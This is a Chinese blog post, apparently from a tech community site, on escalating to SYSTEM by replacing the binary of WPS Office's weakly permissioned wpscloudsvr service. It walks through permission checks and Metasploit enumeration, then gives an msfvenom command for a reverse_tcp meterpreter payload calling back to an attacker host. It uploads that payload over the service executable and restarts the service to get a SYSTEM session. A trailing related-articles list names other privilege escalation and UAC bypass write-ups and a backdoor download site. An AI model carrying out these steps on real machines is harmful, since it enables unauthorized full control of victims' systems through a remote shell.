利用WPS-Office绕过UAC提权

简介: 利用WPS-Office绕过UAC提权


0x01 前言

wpscloudsvr服务用于提供WPSOffice云服务,其中包括:云文档,文件安全性,VIP服务等,以实现完整和安全的用户体验,及时更新和错误修复,停止此服务将禁用云服务和及时错误修复等。


但这个服务貌似并没有起到其实际作用,因为它默认为停止状态,启动类型为禁止或者手动,而且运行的是WPSOffice安装目录下的wpscloudsvr.exe,并非该服务指定的wpscloudsvr.exe。


本地测试环境信息:


操作系统:Windows 10教育版17134、Windows Server 2016 Datacenter
软件版本:WPS Office 2020 11.1.0.9999
WPS Office安装路径:D:\WPS Office\
WPS Office进程名:wps.exe、wpscloudsvr.exe等
WPS Office服务名:wpscloudsvr(WPS Office Cloud Service)


0x02 绕过原理分析

WPSOffice在安装时创建的wpscloudsvr服务默认是以SYSTEM权限运行的,而且允许在ApplicationPoolIdentity、NetworkService和未过UAC的用户启动和停止该服务,并且有权限替换服务指定的wpscloudsvr.exe,所以能够直接利用这种方式进行权限提升,但需要注意以下几点。

1. 不是所有服务都可以用未过UAC的用户来启动和停止的,如:KugouService、Everything等;

2. wpscloudsvr.exe Users权限问题,Win10和2016默认给的权限不一样,可能会替换不了文件;

3. WPSOffic新版本中可能已经修复该问题,可以替换文件,但是不能启动wpscloudsvr服务;

    get-acl .\wpscloudsvr.exe | format-list
    icacls wpscloudsvr.exe
    net start wpscloudsvr


    0x02 模拟实战测试

    (1) 使用MSF下的post/windows/gather/enum_services模块获取当前主机上的服务信息,找到一个以SYSTEM权限运行的wpscloudsvr服务,并且可用net命令停止和开启该服务。

      meterpreter > run post/windows/gather/enum_services


      (2) 既然有权限启动和停止wpscloudsvr服务,那么我们就直接将该服务的可执行文件替换为远控马或MSF攻击载荷,不过必须拥有Users完全控制权限才可替换,替换前记得备份一下,然后依次执行以下命令并重启wpscloudsvr服务后即可得到一个SYSTEM权限会话

        root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443-f exe > /tmp/wpscloudsvr.exe
        meterpreter > cd C:\\ProgramData\\Kingsoft\\office6\\
        meterpreter > cp wpscloudsvr.exe wpscloudsvr1.exe
        meterpreter > upload /tmp/wpscloudsvr.exe wpscloudsvr.exe
        meterpreter > execute -Hc -i -f "c:\\windows\\system32\\cmd.exe" -a "/c net start wpscloudsvr"


        参考文章:

        https://mp.weixin.qq.com/s/s1xWapre2xa5bAP-VoY_Ww

        相关文章
        |
        3月前
        |
        数据安全/隐私保护
        一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站
        一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站
        |
        安全 Windows
        Windows提权/杀软进程在线对比
        Windows提权/杀软进程在线对比
        420 0
        Windows提权/杀软进程在线对比
        |
        安全 Windows
        [windows提权] 注册表AlwaysInstallElevated提权
        注册表AlwaysInstallElevated是策略设置项,允许低权限用户以system权限运行安装文件,powerup中的Get-RegistryAlwaysInstallElevate模块可用来检查注册表键是否被设置。如果为Ture就证明是以system权限运行的,可提权。
        384 0
        |
        安全 Shell 数据安全/隐私保护
        [windows提权] 详解-可信任服务路径提权
        "包含空格但没有引号的服务路径",利用windows解析文件路径的特性,如果一个服务的可执行文件路径热设置不当,攻击者可构造对应的可执行文件,从而利用提权,powerup的Get-ServiceUnquoted模块、配合MSF,可以自动化帮我们完成提权
        295 0
        |
        安全 Windows
        Windows新0day漏洞可穿透UAC
        Sophos今天公布了一个新的Windows 0day漏洞,该漏洞允许应用程序提升权限到“系统”等级,从而绕过Vista和Windows 7的用户帐户控制(UAC)。 该漏洞发生于Win32k.sys中的一个错误,这是Windows内核的一部分,该缺陷关系到一个特定的注册表键值,可以使攻击者伪造系统账户,并无限制地访问所有的Windows组件,该安全漏洞似乎影响所有的Windows版本,但并不会允许远程执行代码。
        993 0
        |
        安全 Windows
        窃取管理权限Windows 7再爆UAC漏洞
        前不久,Windows 7 Beta中的UAC(用户帐户控制)被发现存在一个安全隐患。该隐患会让恶意软件在试图关闭UAC功能时,不会激活系统对用户进行安全提示。当时,微软对此表示,该安全隐患并不是漏洞,而是某种功能的一部分。
        813 0
        |
        安全 Windows Shell
        DccwBypassUAC - Windows 8.1和10 UAC绕过dccw exe中的WinSxS
        版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396473 ...
        1567 0
        |
        数据安全/隐私保护
        |
        安全 数据安全/隐私保护 Windows